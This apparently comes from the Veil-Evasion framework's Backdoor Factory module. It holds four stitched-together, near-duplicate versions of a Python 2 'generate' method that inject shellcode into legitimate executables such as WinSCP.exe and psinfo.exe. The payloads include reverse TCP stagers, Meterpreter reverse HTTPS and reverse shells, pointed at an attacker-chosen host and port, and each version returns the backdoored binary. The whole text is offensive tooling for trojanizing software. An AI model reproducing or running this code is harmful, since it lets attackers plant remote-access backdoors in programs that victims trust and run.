def generate(self):
#Because of calling BDF via classes, obsolute paths change
if self.required_options["orig_exe"][0] == "WinSCP.exe":
self.required_options["orig_exe"][
0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"
#Make sure the bin is supported
self.basicDiscovery()
if self.required_options["payload"][0] == "custom":
Shellcode = self.shellcode.generate()
raw = Shellcode.decode("string_escape")
f = open(settings.TEMP_DIR + "shellcode.raw", 'wb')
f.write(raw)
f.close()
print "shellcode", settings.TEMP_DIR + "shellcode.raw"
#invoke the class for the associated binary
if self.type == 'PE':
targetFile = pebin.pebin(
FILE=self.required_options["orig_exe"][0],
OUTPUT='payload.exe',
SHELL='user_supplied_shellcode',
SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
self.extension = "exe"
elif self.type == 'ELF':
targetFile = elfbin.elfbin(
FILE=self.required_options["orig_exe"][0],
OUTPUT='payload.exe',
SHELL='user_supplied_shellcode',
SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
self.extension = ""
else:
print "\nInvalid File or File Type Submitted, try again.\n"
return ""
else:
shellcodeChoice = ""
if self.required_options["payload"][0] == "meter_tcp":
shellcodeChoice = "reverse_tcp_stager"
elif self.required_options["payload"][
0] == "meter_https" and self.type == "PE":
shellcodeChoice = "meterpreter_reverse_https"
elif self.required_options["payload"][0] == "rev_shell":
shellcodeChoice = "reverse_shell_tcp"
else:
print helpers.color(
"\n [!] Please enter a valid payload choice.",
warning=True)
raw_input("\n [>] Press any key to return to the main menu:")
return ""
# invoke the class for the associated binary
if self.type == 'PE':
targetFile = pebin.pebin(
FILE=self.required_options["orig_exe"][0],
OUTPUT='payload.exe',
SHELL=shellcodeChoice,
HOST=self.required_options["LHOST"][0],
PORT=int(self.required_options["LPORT"][0]))
self.extension = "exe"
elif self.type == 'ELF':
targetFile = elfbin.elfbin(
FILE=self.required_options["orig_exe"][0],
OUTPUT='payload.exe',
SHELL=shellcodeChoice,
HOST=self.required_options["LHOST"][0],
PORT=int(self.required_options["LPORT"][0]))
self.extension = ""
else:
print "\nInvalid File or File Type Submitted, try again.\n"
return ""
print helpers.color("\n[*] Running The Backdoor Factory...")
try:
#PATCH STUFF
try:
targetFile.run_this()
except SystemExit as e:
#I use sys.exits in BDF, so not to leave Veil
print "\nBackdoorFactory Error, check options and binary\n"
return ""
#Because shits fast yo
time.sleep(4)
# read in the output .exe from /tmp/
f = open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe",
'rb')
PayloadCode = f.read()
f.close()
except IOError:
print "\nError during The Backdoor Factory execution\n"
raw_input("\n[>] Press any key to return to the main menu:")
return ""
try:
#remove backdoored/ in VEIL root
shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')
except Exception as e:
#quiet failure
pass
return PayloadCode
def generate(self):
#Because of calling BDF via classes, absolute paths change
if self.required_options["orig_exe"][0] == "WinSCP.exe":
self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"
#Make sure the bin is supported
self.basicDiscovery()
if self.required_options["payload"][0] == "custom":
Shellcode = self.shellcode.generate()
raw = Shellcode.decode("string_escape")
with open(settings.TEMP_DIR + "shellcode.raw", 'wb') as f:
f.write(raw)
print "shellcode", settings.TEMP_DIR + "shellcode.raw"
#invoke the class for the associated binary
if self.type == 'PE':
targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe',
SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw",
PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
self.extension = "exe"
elif self.type == 'ELF':
targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
self.extension = ""
else:
print "\nInvalid File or File Type Submitted, try again.\n"
return ""
else:
shellcodeChoice = self.required_options['payload'][0]
# invoke the class for the associated binary
if self.type == 'PE':
targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe',
SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0],
PORT=int(self.required_options["LPORT"][0]),
PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
self.extension = "exe"
elif self.type == 'ELF':
targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0],
OUTPUT='payload.exe', SHELL=shellcodeChoice,
HOST=self.required_options["LHOST"][0],
PORT=int(self.required_options["LPORT"][0]))
self.extension = ""
else:
print "\nInvalid File or File Type Submitted, try again.\n"
return ""
print helpers.color("\n[*] Running The Backdoor Factory...")
#PATCH STUFF
try:
targetFile.run_this()
except:
#I use sys.exits in BDF, so not to leave Veil
print "\nBackdoorFactory Error, check options and binary\n"
raw_input("\n[>] Press any key to return to the main menu:")
return ""
#Because speed
time.sleep(3)
try:
# read in the output .exe from /tmp/
with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe", 'rb') as f:
PayloadCode = f.read()
except IOError:
print "\nError during The Backdoor Factory execution\n"
raw_input("\n[>] Press any key to return to the main menu:")
return ""
try:
#remove backdoored/ in VEIL root
shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')
except:
#quiet failure
pass
return PayloadCode
def generate(self):
#Because of calling BDF via classes, absolute paths change
if self.required_options["ORIGINAL_EXE"][0] == "WinSCP.exe":
self.required_options["ORIGINAL_EXE"][
0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"
#Make sure the bin is supported
self.basicDiscovery()
shellcodeChoice = self.required_options['PAYLOAD'][0]
#cave_miner_inline
#iat_reverse_tcp_inline
#iat_reverse_tcp_inline_threaded
#iat_reverse_tcp_stager_threaded
#iat_user_supplied_shellcode_threaded
#meterpreter_reverse_https_threaded
#reverse_shell_tcp_inline
#reverse_tcp_stager_threaded
#user_supplied_shellcode_threaded
#if self.type == 'PE':
# if not (shellcodeChoice == 'meterpreter_https' and shellcodeChoice == 'meter_https'
# and shellcodeChoice == 'meterpreter_tcp' and shellcodeChoice == 'meter_tcp'
# and shellcodeChoice == 'reverse_shell' and shellcodeChoice == 'rev_shell'
# and shellcodeChoice == 'custom'):
# print helpers.color("\n [*] Invalid payload: %s..." % shellcodeChoice, warning=True)
# return ""
#elif self.type == 'ELF':
# if not (shellcodeChoice == 'meterpreter_tcp' and shellcodeChoice == 'meter_tcp'
# and shellcodeChoice == 'reverse_shell' and shellcodeChoice == 'rev_shell'
# and shellcodeChoice == 'custom'):
# print helpers.color("\n[*] Invalid payload: %s..." % shellcodeChoice, warning=True)
# return ""
#else:
# print helpers.color("\n[*] Invalid type: %s..." % self.type, warning=True)
# return ""
if shellcodeChoice == "custom":
Shellcode = self.shellcode.generate(self.required_options)
raw = Shellcode.decode("string_escape")
with open(settings.TEMP_DIR + "shellcode.raw", 'wb') as f:
f.write(raw)
print "shellcode", settings.TEMP_DIR + "shellcode.raw"
#invoke the class for the associated binary
if self.type == 'PE':
targetFile = pebin.pebin(
FILE=self.required_options["ORIGINAL_EXE"][0],
OUTPUT='payload.exe',
SHELL='user_supplied_shellcode',
SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw",
PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
self.extension = "exe"
elif self.type == 'ELF':
targetFile = elfbin.elfbin(
FILE=self.required_options["ORIGINAL_EXE"][0],
OUTPUT='payload.exe',
SHELL='user_supplied_shellcode',
SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
self.extension = ""
else:
print "\nInvalid File or File Type Submitted, try again.\n"
return ""
else:
# invoke the class for the associated binary
if self.type == 'PE':
targetFile = pebin.pebin(
FILE=self.required_options["ORIGINAL_EXE"][0],
OUTPUT='payload.exe',
SHELL=shellcodeChoice,
HOST=self.required_options["LHOST"][0],
PORT=int(self.required_options["LPORT"][0]),
PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
self.extension = "exe"
elif self.type == 'ELF':
targetFile = elfbin.elfbin(
FILE=self.required_options["ORIGINAL_EXE"][0],
OUTPUT='payload.exe',
SHELL=shellcodeChoice,
HOST=self.required_options["LHOST"][0],
PORT=int(self.required_options["LPORT"][0]))
self.extension = ""
else:
print "\nInvalid File or File Type Submitted, try again.\n"
return ""
print helpers.color("\n[*] Running The Backdoor Factory...")
#PATCH STUFF
try:
targetFile.run_this()
except:
#I use sys.exits in BDF, so not to leave Veil
print "\nBackdoorFactory Error, check options and binary\n"
raw_input("\n[>] Press any key to return to the main menu.")
return ""
#Because speed
time.sleep(3)
try:
# read in the output .exe from /tmp/
with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe",
'rb') as f:
PayloadCode = f.read()
except IOError:
print "\nError during The Backdoor Factory execution\n"
raw_input("\n[>] Press any key to return to the main menu.")
return ""
try:
#remove backdoored/ in VEIL root
shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')
except:
#quiet failure
pass
return PayloadCode
def generate(self):
#Because of calling BDF via classes, obsolute paths change
if self.required_options["orig_exe"][0] == "psinfo.exe":
self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/psinfo.exe"
#Make sure the bin is supported
self.basicDiscovery()
if self.required_options["payload"][0] == "custom":
Shellcode = self.shellcode.generate()
raw = Shellcode.decode("string_escape")
f = open(settings.TEMP_DIR + "shellcode.raw", 'wb')
f.write(raw)
f.close()
print "shellcode", settings.TEMP_DIR + "shellcode.raw"
#invoke the class for the associated binary
if self.type == 'PE':
targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
self.extension = "exe"
elif self.type == 'ELF':
targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
self.extension = ""
else:
print "\nInvalid File or File Type Submitted, try again.\n"
return ""
else:
shellcodeChoice = ""
if self.required_options["payload"][0] == "meter_tcp":
shellcodeChoice = "reverse_tcp_stager"
elif self.required_options["payload"][0] == "meter_https" and self.type == "PE":
shellcodeChoice = "meterpreter_reverse_https"
elif self.required_options["payload"][0] == "rev_shell":
shellcodeChoice = "reverse_shell_tcp"
else:
print helpers.color("\n [!] Please enter a valid payload choice.", warning=True)
raw_input("\n [>] Press any key to return to the main menu:")
return ""
# invoke the class for the associated binary
if self.type == 'PE':
targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0]))
self.extension = "exe"
elif self.type == 'ELF':
targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0]))
self.extension = ""
else:
print "\nInvalid File or File Type Submitted, try again.\n"
return ""
print helpers.color("\n[*] Running The Backdoor Factory...")
try:
#PATCH STUFF
try:
targetFile.run_this()
except SystemExit as e:
#I use sys.exits in BDF, so not to leave Veil
print "\nBackdoorFactory Error, check options and binary\n"
return ""
#Because shits fast yo
time.sleep(4)
# read in the output .exe from /tmp/
f = open(settings.VEIL_EVASION_PATH+"backdoored/payload.exe", 'rb')
PayloadCode = f.read()
f.close()
except IOError:
print "\nError during The Backdoor Factory execution\n"
raw_input("\n[>] Press any key to return to the main menu:")
return ""
try:
#remove backdoored/ in VEIL root
shutil.rmtree(settings.VEIL_EVASION_PATH+'backdoored')
except Exception as e:
#quiet failure
pass
return PayloadCode